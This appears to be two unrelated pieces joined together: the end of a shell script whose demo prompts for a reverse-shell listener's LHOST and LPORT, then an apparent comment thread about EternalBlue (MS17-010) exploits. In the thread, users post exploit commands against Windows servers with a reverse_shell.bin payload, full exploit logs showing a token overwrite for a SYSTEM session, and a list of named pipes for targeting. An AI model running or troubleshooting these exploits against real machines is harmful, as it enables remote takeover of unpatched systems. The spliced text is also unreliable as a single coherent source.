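        ''|*[!0-9.]*) return 1 ;;   # only digits and dots may appear
    esac
    _old_ifs=$IFS
    IFS=.
    set -- $1                      # split on dots; no glob chars can remain
    IFS=$_old_ifs
    [ $# -eq 4 ] || return 1
    for _octet in "$@"; do
        case $_octet in
            ''|????*) return 1 ;;  # empty field or more than three digits
        esac
        [ "$_octet" -le 255 ] || return 1
    done
    return 0
}

# ask_until_valid LABEL CHECKER: re-prompt until CHECKER accepts the answer,
# or give up (status 1) when input runs out instead of spinning forever.
ask_until_valid() {
    while _answer=$(prompt "$1"); do
        if "$2" "$_answer"; then
            printf '%s\n' "$_answer"
            return 0
        fi
        printf 'invalid input, try again\n' >&2
    done
    return 1
}

# Interactive demo, run with: sh portable_prompt.sh --demo
main() {
    lhost=$(ask_until_valid 'LHOST for the listener: ' is_ipv4) || exit 1
    lport=$(ask_until_valid 'LPORT for the listener: ' is_port) || exit 1
    printf 'listener would bind %s:%s\n' "$lhost" "$lport"
}
if [ "${1:-}" = --demo ]; then
    main
fi
```

Because the helpers read from standard input and write the prompt to standard error, they can be exercised non-interactively by piping answers in, which is also how a script built on them can be tested before it is run against a live system.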
Thanks for your click.
Attacking machine: Kali 2021
Attacked machine: Windows Server 2012 R2
When I compile:
python eternalblue_exploit8.py (windows server 2012 r2 's ip) reverse_shell.bin 500
Traceback (most recent call last):
File "/home/kali/desktop/eternalblue_exploit8.py", line 542, in
fp = open(sys.argv[2], 'rb')
^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: 'reverse_shell.bin'
How do I solve it?
I use a translator and my English is poor, please forgive me if there are some errors.
Any thoughts on why running python zzz_exploit.py x.x.x.x
ends up like this?
[*] Target OS: Windows 5.1
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x8171e930
SESSION: 0xe11493f0
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe1d8c030
Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!
RestrictedSids: 0xe1d60c30
RestrictedSidCount: 0x1f4
userAndGroupCount: 0x4c
userAndGroupsAddr: 0xe1d8c0b8
Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1d8c0b8
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[-] got exception
CRITICAL:root:SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Done
python eternal_checker.py 192.168.0.102
Traceback (most recent call last):
File "eternal_checker.py", line 1, in
from mysmb import MYSMB
File "/home/kali/soft/AutoBlue-MS17-010/mysmb.py", line 3, in
from impacket import smb, smbconnection
ImportError: No module named impacket
Please help me. I ran pip install impacket, but it's not working.
Hi
I have tested it on vulnerable Windows 7 and Windows 2008 none of them worked:
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
no shell back in msf
Metasploit uses the following list of named pipes:
netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd
Would it make sense to add support for all of these named pipes?
The reason I ask is because I received the following output when running eternalblue_checker.py:
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED